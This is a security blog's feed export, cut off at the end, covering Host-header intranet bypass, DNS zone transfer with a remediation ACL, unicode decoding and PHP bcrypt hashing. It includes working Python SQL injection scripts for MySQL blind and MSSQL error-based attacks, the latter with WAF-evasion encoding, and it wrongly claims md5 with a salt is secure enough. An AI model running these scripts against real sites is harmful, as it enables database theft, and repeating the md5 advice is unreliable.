<p>For example:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxx.com is the public site and resolves to the IP of the public network card.</span><br><span class="line">admin.xxx.com is the management site and resolves to the intranet network card.</span><br></pre></td></tr></table></figure></p>
<p>It looks as though the management site admin.xxx.com can only be reached from the intranet, but this overlooks the host binding problem.</p>
<p>If we forcibly bind the public IP address to admin.xxx.com and the web server performs no origin check, we can reach from the public Internet a management site that should only be accessible from the intranet.</p>
<p>And because it is an intranet site, administrators very often use weak passwords for convenience, or leave it without any authentication at all.</p>
<p><strong>3、Exploitation</strong><br>Exploitation can start with a brute-force enumeration of domain names</p>
<p>Record every domain name together with its public or intranet IP</p>
<p>For example<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxx.com ip 1.1.1.1</span><br><span class="line">admin.xxx.com ip 10.0.0.1</span><br></pre></td></tr></table></figure></p>
<p>Then use a tool to bind the intranet domain name to the public site's IP</p>
<p>Write it into the hosts file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.1.1.1 admin.xxx.com</span><br></pre></td></tr></table></figure></p>
<p>and the intranet site becomes reachable</p>
<p><strong>4、Cases</strong><br><a href="http://www.wooyun.org/bugs/wooyun-2014-081180" target="_blank" rel="external">Tuniu: an unusual route exposes some sensitive intranet systems</a></p>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-093577" target="_blank" rel="external">Shanda: injection in a game GM tool leads into the back end</a></p>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-088352" target="_blank" rel="external">Maxthon: partial intranet roaming (large amounts of internal and external source code can be leaked)</a></p>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-0134151" target="_blank" rel="external">Yixia Tech: improper operations lead to a leak of internal sensitive information</a></p>
<p>Reposted from: <a href="http://wiki.wooyun.org/server:host" target="_blank" rel="external">http://wiki.wooyun.org/server:host</a></p>
]]></content>
<summary type="html">
<p><strong>1、The Host header</strong><br>Host-header binding is a common way for sites to run several sites on one machine. It is considerably safer than using different ports for the same purpose, because ports can be found by brute force, whereas host binding is much harder to crack since it requires knowing the mapping between IP and host name.
</summary>
<category term="其他安全" scheme="http://wps2015.org/categories/%E5%85%B6%E4%BB%96%E5%AE%89%E5%85%A8/"/>
<category term="host" scheme="http://wps2015.org/tags/host/"/>
</entry>
<entry>
<title>MySQL boolean-based blind injection script</title>
<link href="http://wps2015.org/2015/07/15/script-of-mysql-boolen-based/"/>
<id>http://wps2015.org/2015/07/15/script-of-mysql-boolen-based/</id>
<published>2015-07-15T14:00:44.000Z</published>
<updated>2016-11-08T01:45:14.089Z</updated>
<content type="html"><![CDATA[<p>When a blind injection point cannot be worked with tools (usually because of a WAF), this script can be used to prove that the vulnerability exists<a id="more"></a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"></span><br><span class="line">import httplib</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line">import sys</span><br><span class="line">import random</span><br><span class="line">import urllib</span><br><span class="line"></span><br><span class="line">headers = {'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63',}</span><br><span class="line">payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')</span><br><span class="line">print 'start to retrive MySQL user:'</span><br><span class="line">user = ''</span><br><span class="line">for i in range(1,21):</span><br><span class="line">    for payload in payloads:</span><br><span class="line">        conn = httplib.HTTPConnection('www.example.com', timeout=4) # connection, host</span><br><span class="line">        s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) # payload</span><br><span class="line">        conn.request(method='GET',url="/php/1.php?id=1 and %s" % s,headers = headers) # url</span><br><span class="line">        html_header= conn.getresponse().read()</span><br><span class="line">        length=len(html_header)</span><br><span class="line">        if length>10000:</span><br><span class="line">            user+=payload</span><br><span class="line">            sys.stdout.write('\r[In progress] %s' % user)</span><br><span class="line">            sys.stdout.flush()</span><br><span class="line">            break</span><br><span class="line">        else:</span><br><span class="line">            print '.',</span><br><span class="line">        conn.close()</span><br><span class="line"></span><br><span class="line">print '\n[Done]MySQL user is', user</span><br></pre></td></tr></table></figure>
]]></content>
<summary type="html">
<p>When a blind injection point cannot be worked with tools (usually because of a WAF), this script can be used to prove that the vulnerability exists
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>DNS zone transfer vulnerabilities: exploitation methods</title>
<link href="http://wps2015.org/2015/07/13/DNS-domain-and-the-exploit/"/>
<id>http://wps2015.org/2015/07/13/DNS-domain-and-the-exploit/</id>
<published>2015-07-13T03:10:37.000Z</published>
<updated>2016-11-08T01:47:09.076Z</updated>
<content type="html"><![CDATA[<p>There are two ways to exploit this, manually or with a tool. We can use Dnsenum under BT5 or another tool; done by hand, nslookup is enough.<a id="more"></a></p>
<p><strong>1、Using a tool to get the DNS information</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /pentest/enumeration/dns/dnsenum</span><br><span class="line">./dnsenum.pl --enum domain.com</span><br></pre></td></tr></table></figure>
<p>That is all it takes.</p>
<p><strong>2、The manual method (recommended).</strong><br>The method is shown in the figure below; the query process is as displayed:</p>
<p><img src="http://www.wooyun.org/upload/201202/15161935b7b1610dcdc653216971d50b16c5e88f.jpg" alt="1259002Mo"><br>The query results are saved in 189store.com.txt<br>View them with the following command<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view 189store.com.txt</span><br></pre></td></tr></table></figure></p>
<p>There are 74 records</p>
<p><img src="http://www.wooyun.org/upload/201202/1516215365c2c8081bb7ba32c7a37bab4b020d78.jpg" alt="125900JRF"><br><img src="http://www.wooyun.org/upload/201202/15162218a04914ae310f75e599a22b128ec49f4b.jpg" alt="125901P6x"></p>
<p><strong>3. Proof of vulnerability:</strong></p>
<p>See the detailed description above</p>
<p><strong>4. Remediation:</strong></p>
<p>Neither ns.westidc.com.cn (221.236.9.9) nor ns.westidc.net.cn (210.77.146.30) has any access control in place.<br>Define an ACL (access control list) to restrict zone transfers to the name servers that need them.<br>Edit /etc/named.conf<br>and in the zone configuration for 189store.com set<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">allow-transfer { localhost; 221.236.9.9; };</span><br><span class="line">or</span><br><span class="line">allow-transfer { localhost; 210.77.146.30; };</span><br></pre></td></tr></table></figure></p>
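<p>As an added example, not part of the original post: a small Python 3 audit that reads a named.conf-style file and reports, for each zone, whether <code>allow-transfer</code> is restricted, open to <code>any</code>, or not set at all. A zone-level <code>allow-transfer</code> overrides the one in <code>options</code>, and when neither is present BIND 9 has historically allowed transfers to any host, which is the situation the fix above addresses. The sample configuration below is constructed, the function names are chosen here, and the parser assumes balanced braces and comments only of the <code>//</code>, <code>#</code> and <code>/* */</code> forms.</p>

```python
"""Audit allow-transfer settings in a named.conf-style file (added example)."""
import re

# Constructed sample; not taken from any real server.
SAMPLE_NAMED_CONF = """
options {
    directory "/var/named";   // no global allow-transfer here
};

zone "example.com" {
    type master;
    file "example.com.zone";
    allow-transfer { localhost; 192.0.2.10; };
};

zone "open.example" {
    type master;
    file "open.zone";
    allow-transfer { any; };   # explicitly open to the world
};

zone "unset.example" {
    type master;
    file "unset.zone";
};
"""


def strip_comments(text):
    """Remove /* */, // and # comments (assumes none of these occur inside strings)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"(//|#).*", "", text)


def top_level_blocks(text):
    """Yield (header, body) for each top-level `header { body };` statement,
    matching braces so that blocks nested inside a zone are handled."""
    i = 0
    while True:
        start = text.find("{", i)
        if start < 0:
            return
        header = text[i:start].strip().lstrip(";").strip()
        depth, j = 0, start
        while j < len(text):
            if text[j] == "{":
                depth += 1
            elif text[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        yield header, text[start + 1:j]
        i = j + 1


def transfer_acl(body):
    """Return the allow-transfer address list, or None if the block has none."""
    m = re.search(r"allow-transfer\s*\{([^}]*)\}", body)
    if not m:
        return None
    return [item.strip() for item in m.group(1).split(";") if item.strip()]


def audit_zone_transfers(conf):
    """Map each zone to 'restricted', 'open (any)' or 'open (unset)'."""
    conf = strip_comments(conf)
    global_acl, zones = None, {}
    for header, body in top_level_blocks(conf):
        if header == "options":
            global_acl = transfer_acl(body)
        elif header.startswith("zone"):
            zones[header.split('"')[1]] = transfer_acl(body)
    verdicts = {}
    for name, acl in zones.items():
        effective = acl if acl is not None else global_acl   # zone overrides options
        if effective is None:
            verdicts[name] = "open (unset)"
        elif "any" in effective:
            verdicts[name] = "open (any)"
        else:
            verdicts[name] = "restricted"
    return verdicts


if __name__ == "__main__":
    for zone, verdict in sorted(audit_zone_transfers(SAMPLE_NAMED_CONF).items()):
        print("%-16s %s" % (zone, verdict))
```

Running it on the sample reports example.com as restricted and the other two zones as open; on a real server the configuration check complements, rather than replaces, an actual AXFR test from an unauthorised address, since include files and views can change what is in effect.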
<p>Original: <a href="http://www.waitalone.cn/post/DNSTransfer.html" target="_blank" rel="external">http://www.waitalone.cn/post/DNSTransfer.html</a></p>
]]></content>
<summary type="html">
<p>There are two ways to exploit this, manually or with a tool. We can use Dnsenum under BT5 or another tool; done by hand, nslookup is enough.
</summary>
<category term="其他安全" scheme="http://wps2015.org/categories/%E5%85%B6%E4%BB%96%E5%AE%89%E5%85%A8/"/>
<category term="DNS" scheme="http://wps2015.org/tags/DNS/"/>
</entry>
<entry>
<title>Converting Python unicode byte strings to Chinese (repost)</title>
<link href="http://wps2015.org/2015/06/18/the-problem-of-python-chinese/"/>
<id>http://wps2015.org/2015/06/18/the-problem-of-python-chinese/</id>
<published>2015-06-18T02:14:26.000Z</published>
<updated>2016-11-08T01:45:23.348Z</updated>
<content type="html"><![CDATA[<p>  As the title says, my problem is simple: while writing a crawler, the page data I fetched contained strings like "\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c". This is actually Chinese in unicode escape form; the corresponding Chinese is "新浪微博注册". All I wanted was a function to make this stuff display as Chinese, but I searched Baidu for ages without finding a suitable one.<a id="more"></a>When you hit this kind of problem, do not search with keywords like "python encoding", "unicode Chinese encoding" or "unicode decoding"; you get a pile of pages that have nothing to do with it.<br>  In fact one function solves it:<br>Example 1:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">>>> s = r"\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c"</span><br><span class="line">>>> s</span><br><span class="line">'\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c'</span><br><span class="line">>>> print s</span><br><span class="line">\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c</span><br><span class="line">>>> s = s.decode("unicode_escape") # this is the function</span><br><span class="line">>>> print s</span><br></pre></td></tr></table></figure></p>
<p>Example 2:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">>>> str_ = "Russopho\xe9bic, clichd and just pl\xe9ain stupid."</span><br><span class="line">>>> print str_</span><br><span class="line">Russopho?bic, clichd and just pl?ain stupid.</span><br><span class="line">>>> str_ = str_.decode("unicode_escape")</span><br><span class="line">>>> print str_</span><br></pre></td></tr></table></figure><br>  This method also solved the "bson.errors.InvalidStringData: strings in documents must be valid UTF-8" error I hit when inserting data into mongodb.<br>  A related blog post on this problem: <a href="http://www.cnblogs.com/yangze/archive/2010/11/16/1878469.html" target="_blank" rel="external">here</a>. There is another problem involving unicode byte strings, with this message: Unicode equal comparison failed to convert both arguments to Unicode - interpreting them as being unequal. It means that the two sides of the comparison have different types, probably a unicode string on one side and a byte string on the other. See <a href="http://stackoverflow.com/questions/3400171/python-utf-8-comparison" target="_blank" rel="external">http://stackoverflow.com/questions/3400171/python-utf-8-comparison</a>.</p>
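<p>The two examples above are Python 2. As an added example (not from the original post), here is the same idea in Python 3, where str and bytes are distinct types: escaped text is first turned into bytes (latin-1, so that raw bytes such as \xe9 survive, as in Example 2) and then decoded with unicode_escape. It also shows the UTF-8 encoding step behind the MongoDB "must be valid UTF-8" error and a comparison helper for the mixed bytes/str case behind the "Unicode equal comparison failed" warning. One caveat the post does not mention: unicode_escape leaves a JSON surrogate pair such as \ud83d\ude00 as two lone surrogates that cannot be encoded to UTF-8, so when the source is JSON, json.loads is the right tool. The function names are chosen here.</p>

```python
"""Python 3 version of the post's unicode_escape trick (added example)."""
import json


def decode_unicode_escapes(raw):
    """Turn literal backslash sequences such as '\\u65b0\\u6d6a' (as seen in
    scraped page text) into real characters.

    Accepts str or bytes. A str is first encoded as latin-1 so that the
    unicode_escape codec sees bytes; latin-1 rather than ascii keeps raw
    bytes like 0xE9 intact, which is what the post's Example 2 relies on.
    backslashreplace lets text that is already decoded round-trip unchanged."""
    if isinstance(raw, str):
        raw = raw.encode("latin-1", errors="backslashreplace")
    return raw.decode("unicode_escape")


def decode_json_escapes(raw):
    """The same escapes, but through the JSON parser, which also recombines
    surrogate pairs (\\ud83d\\ude00 becomes one character); unicode_escape
    does not. `raw` must be the body of a JSON string (no unescaped quotes)."""
    return json.loads('"' + raw + '"')


def to_utf8_bytes(text):
    """What a driver such as pymongo requires: valid UTF-8. Lone surrogates
    raise UnicodeEncodeError here instead of being stored as garbage."""
    return text.encode("utf-8")


def same_text(a, b):
    """Compare text whether each side arrived as UTF-8 bytes or as str.
    Python 2 warned and treated str/unicode mismatches as unequal; Python 3
    silently returns False for str == bytes, so normalise first."""
    if isinstance(a, bytes):
        a = a.decode("utf-8")
    if isinstance(b, bytes):
        b = b.decode("utf-8")
    return a == b


if __name__ == "__main__":
    print(decode_unicode_escapes(r"\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c"))
    print(decode_unicode_escapes(b"Russopho\xe9bic, clichd and just pl\xe9ain stupid."))
```

Note that unicode_escape also interprets every other backslash sequence (\n, \t, \x..), so it should only be applied to text known to carry such escapes, never to arbitrary scraped data such as Windows paths.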
<p>Takeaway:<br>Next time you hit a strange problem, think about the keywords before you search, or you may well come away with nothing.</p>
<hr>
<p>Reposted from: <a href="http://windkeepblow.blog.163.com/blog/static/1914883312013988185783/" target="_blank" rel="external">http://windkeepblow.blog.163.com/blog/static/1914883312013988185783/</a></p>
]]></content>
<summary type="html">
<p>&emsp;&emsp;As the title says, my problem is simple: while writing a crawler, the page data I fetched contained strings like "\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c". This is actually Chinese in unicode escape form; the corresponding Chinese is "新浪微博注册". All I wanted was a function to make this stuff display as Chinese, but I searched Baidu for ages without finding a suitable one.
</summary>
<category term="编程之美" scheme="http://wps2015.org/categories/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>Hashing passwords with Bcrypt in PHP 5.5</title>
<link href="http://wps2015.org/2015/05/21/Bcrypt-in-php5.5/"/>
<id>http://wps2015.org/2015/05/21/Bcrypt-in-php5.5/</id>
<published>2015-05-21T06:58:55.000Z</published>
<updated>2016-12-23T07:06:45.621Z</updated>
<content type="html"><![CDATA[<p>PHP 5.5 adds a new password-hashing API that makes salted, secure password hashing with Bcrypt easy.</p>
<p>Unlike symmetric or asymmetric encryption, bcrypt neither decrypts anything to recover the plaintext nor encrypts a second time and compares ciphertexts. Instead, the plaintext is run through the hash function together with the stored value (which carries the salt and cost) to produce another hash; if that matches the stored one, verification succeeds.<a id="more"></a></p>
<p>The official manual is here: <a href="http://cn2.php.net/manual/zh/book.password.php" target="_blank" rel="external">http://cn2.php.net/manual/zh/book.password.php</a></p>
<p>Generating the hash</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$hash = password_hash(<span class="string">'password'</span>,PASSWORD_BCRYPT,[<span class="string">'cost'</span> => <span class="number">10</span>]);</span><br><span class="line"><span class="keyword">echo</span> $hash;</span><br></pre></td></tr></table></figure>
<p>password_hash(): hashes a password<br>1st parameter: the password to hash<br>2nd parameter: the algorithm constant (<a href="http://cn2.php.net/manual/zh/password.constants.php" target="_blank" rel="external">http://cn2.php.net/manual/zh/password.constants.php</a>)<br>3rd parameter: an options array. Two options are supported: salt, the salt (random string) mixed into the hash, and cost, the work factor (bcrypt runs 2^cost rounds, so each increment doubles the running time). Note that supplying your own salt has been deprecated since PHP 7.0; let password_hash() generate it.</p>
<p>The code above produces a different hash on every run; it looks roughly like this.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="number">2</span>y$<span class="number">10</span>$bWNfw6QbjmjyCDBc9lrZRuBjraxBzN7eAuozS6D3r4QxJn0tgXRwe</span><br></pre></td></tr></table></figure>
<p>The generated hash is 60 characters long, so bear that in mind when designing the database column (if you use PASSWORD_DEFAULT instead, the manual recommends a wider column such as 255, because the default algorithm may change in a future version).</p>
<p>Verifying the hash</p>
<p>I could not be bothered to store it in the database and read it back, so I just pasted in the hash generated above~~</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$hash = <span class="string">'$2y$10$bWNfw6QbjmjyCDBc9lrZRuBjraxBzN7eAuozS6D3r4QxJn0tgXRwe'</span>;</span><br><span class="line">$res = password_verify(<span class="string">'password'</span>,$hash);</span><br><span class="line">var_dump($res);</span><br></pre></td></tr></table></figure>
<p>Barring natural disasters or other accidents, you will see the following output</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bool(true)</span><br></pre></td></tr></table></figure>
<p>Success.</p>
<p>Performance</p>
<p>Now let us look at Bcrypt's performance. Greater security always comes at the cost of performance, and bcrypt's stronger password protection certainly means longer running time. So let us compare the speed of Bcrypt with plain md5.</p>
<p>Test machine:</p>
<p>CPU: i7, 4 cores, 2.3 GHz<br>RAM: 16 GB DDR3<br>OS: Mac<br>PHP 5.5.15</p>
<p>Now use the following code to time md5 and Bcrypt, each without a salt<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$s_time = microtime(<span class="keyword">true</span>);</span><br><span class="line">password_hash(<span class="string">'password'</span>,PASSWORD_BCRYPT,[<span class="string">'cost'</span> => <span class="number">10</span>]);</span><br><span class="line"><span class="comment">// md5('password');</span></span><br><span class="line">$e_time = microtime(<span class="keyword">true</span>);</span><br><span class="line">$run_time = $e_time-$s_time;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> ($run_time*<span class="number">1000</span>).<span class="string">'ms'</span>;</span><br></pre></td></tr></table></figure></p>
<p>Bcrypt, 5 runs<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">68.569183349609ms</span><br><span class="line">68.006992340088ms</span><br><span class="line">69.074869155884ms</span><br><span class="line">68.211078643799ms</span><br><span class="line">68.757057189941ms</span><br></pre></td></tr></table></figure></p>
<p>md5, 5 runs</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0.0040531158447266ms</span><br><span class="line">0.0040531158447266ms</span><br><span class="line">0.0050067901611328ms</span><br><span class="line">0.0040531158447266ms</span><br></pre></td></tr></table></figure>
<p>Results</p>
<p>Bcrypt takes about 68 ms per hash on average and md5 about 0.004 ms, a performance gap of roughly 16,000 times.<br>md5 can hash about 250,000 passwords per second<br>Bcrypt about 14 per second<br>So if you want to use Bcrypt in your application: a small application is fine, but a large one means multiplying your servers.<br>Unless you are writing software for the Pentagon, md5+salt is in fact secure enough.</p>
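<p>As an added example that is not part of the original post: a Python 3 parser for the <code>$2y$cost$salt+hash</code> string that password_hash() returns, a check equivalent to PHP's password_needs_rehash() written against it, and the cost/time relation behind the timing numbers above (bcrypt runs 2^cost rounds, so each +1 on cost doubles the time). The hash string is the one printed earlier in this post; the reference of 68 ms at cost 10 is the post's own measurement; the function names are chosen here.</p>

```python
"""Parse and reason about bcrypt hash strings (added example, Python 3)."""
import re

# Modular crypt format produced by password_hash(..., PASSWORD_BCRYPT):
#   $2y$<cost>$<22-char salt><31-char digest>  ->  60 characters in total.
# bcrypt uses its own base64 alphabet: . / A-Z a-z 0-9
BCRYPT_RE = re.compile(
    r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# Hash printed in the post above; the corresponding password is 'password'.
SAMPLE_HASH = "$2y$10$bWNfw6QbjmjyCDBc9lrZRuBjraxBzN7eAuozS6D3r4QxJn0tgXRwe"


def parse_bcrypt(h):
    """Split a bcrypt string into its fields; raise ValueError if it is not one."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash string: %r" % h)
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:            # range accepted by the bcrypt algorithm
        raise ValueError("bcrypt cost out of range: %d" % cost)
    return {"variant": variant, "cost": cost, "salt": salt,
            "digest": digest, "length": len(h)}


def needs_rehash(h, target_cost):
    """Equivalent of PHP's password_needs_rehash(): True when the stored value
    was made with a different cost, or is not a bcrypt hash at all (for
    instance a legacy md5 hex digest), so it should be rehashed at next login."""
    try:
        return parse_bcrypt(h)["cost"] != target_cost
    except ValueError:
        return True


def estimated_ms(cost, ref_cost=10, ref_ms=68.0):
    """Time per hash at `cost`, extrapolated from a measured reference point:
    bcrypt performs 2**cost rounds, so each +1 on cost doubles the time."""
    return ref_ms * 2 ** (cost - ref_cost)


def hashes_per_second(cost, ref_cost=10, ref_ms=68.0):
    """Throughput of one core at `cost`, the figure an attacker also faces."""
    return 1000.0 / estimated_ms(cost, ref_cost, ref_ms)


if __name__ == "__main__":
    print(parse_bcrypt(SAMPLE_HASH))
    for c in (10, 11, 12):
        print("cost %d: ~%.0f ms, ~%.1f hashes/s" % (c, estimated_ms(c), hashes_per_second(c)))
```

The cost parameter is the knob for the trade-off discussed above: the 68 ms measured at cost 10 becomes about 136 ms at cost 11 and 272 ms at cost 12, and the same slowdown applies to anyone guessing passwords offline against a stolen table, which is the property a fast hash such as md5 (salted or not) lacks.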
]]></content>
<summary type="html">
<p>PHP 5.5 adds a new password-hashing API that makes salted, secure password hashing with Bcrypt easy.</p>
<p>Unlike symmetric or asymmetric encryption, bcrypt neither decrypts anything to recover the plaintext nor encrypts a second time and compares ciphertexts. Instead, the plaintext is run through the hash function together with the stored value (which carries the salt and cost) to produce another hash; if that matches the stored one, verification succeeds.
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="php" scheme="http://wps2015.org/tags/php/"/>
</entry>
<entry>
<title>Script for MSSQL error-based injection (GET)</title>
<link href="http://wps2015.org/2015/04/07/script-of-mssql-error-based/"/>
<id>http://wps2015.org/2015/04/07/script-of-mssql-error-based/</id>
<published>2015-04-07T13:02:13.000Z</published>
<updated>2016-11-08T01:44:35.011Z</updated>
<content type="html"><![CDATA[<p>When doing MSSQL injection, for all sorts of reasons we sometimes cannot use a tool to retrieve values, so we can write our own script to do it. Python is widely used for this because of how well it fetches web pages.<a id="more"></a></p>
<p>For GET-type MSSQL error-based injection, the code is as follows:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line">#coding=utf-8</span><br><span class="line">import re</span><br><span class="line">import urllib</span><br><span class="line">import urllib2</span><br><span class="line">#Fetch the error message from the requested URL</span><br><span class="line"></span><br><span class="line">def getcontent(payload): #fetch the page content</span><br><span class="line">    url1=url+"AND ("+payload+")=1 --- "</span><br><span class="line">    content = urllib.urlopen(url1).read()</span><br><span class="line">    print content</span><br><span class="line">    return content</span><br><span class="line"></span><br><span class="line">#Extract the value from the error echo</span><br><span class="line">def getdata(content):</span><br><span class="line">    patt = re.compile("nvarchar.*?'(.*?)'.*?int")</span><br><span class="line">    data = patt.findall(content)</span><br><span class="line">    if data:</span><br><span class="line">        return data[0]</span><br><span class="line">    else:</span><br><span class="line">        return None</span><br><span class="line">#Get the current database name</span><br><span class="line">def getcurrentdb():</span><br><span class="line">    payload = 'db_name()'</span><br><span class="line">    content = getcontent(payload)</span><br><span class="line">    data = getdata(content)</span><br><span class="line">    print "current_db: "+data</span><br><span class="line">    return data</span><br><span class="line">def gettablename(dbname,n): #get the table names</span><br><span class="line">    tablelist1=[]</span><br><span class="line">    for i in range(n):</span><br><span class="line">        payload = "select top 1 name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' and name not in(select top "+str(i)+" name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' order by name) order by name"</span><br><span class="line">        try:</span><br><span class="line">            content = getcontent(payload)</span><br><span class="line">            data = getdata(content)</span><br><span class="line">            #print data</span><br><span class="line">            if data not in tablelist1:</span><br><span class="line">                tablelist1.append(data)</span><br><span class="line">            else:</span><br><span class="line">                break</span><br><span class="line">        except:</span><br><span class="line">            continue</span><br><span class="line">    print tablelist1</span><br><span class="line">    print '--------------------'</span><br><span class="line"></span><br><span class="line">def getcolumns(dbname,table,n): #get the column names</span><br><span class="line">    tablelist2=[]</span><br><span class="line">    for i in range(n):</span><br><span class="line">        payload="Select top 1 name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') and name not in (Select top "+str(i)+" Name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') order by name) order by name"</span><br><span class="line">        try:</span><br><span class="line">            content = getcontent(payload)</span><br><span class="line">            data = getdata(content)</span><br><span class="line">            if data not in tablelist2:</span><br><span class="line">                tablelist2.append(data)</span><br><span class="line">            else:</span><br><span class="line">                break</span><br><span class="line">        except:</span><br><span class="line">            continue</span><br><span class="line">    print table</span><br><span class="line">    print tablelist2</span><br><span class="line">    print '--------------------'</span><br><span class="line">def getvalue(dbname,table,column,n): #get the values of each field</span><br><span class="line">    tablelist3=[]</span><br><span class="line">    for i in range(n):</span><br><span class="line">        payload="select top 1 "+column+" %u0066rom "+table+" where "+column+" not in(select top "+str(i)+" "+column+" %u0066rom "+table+" 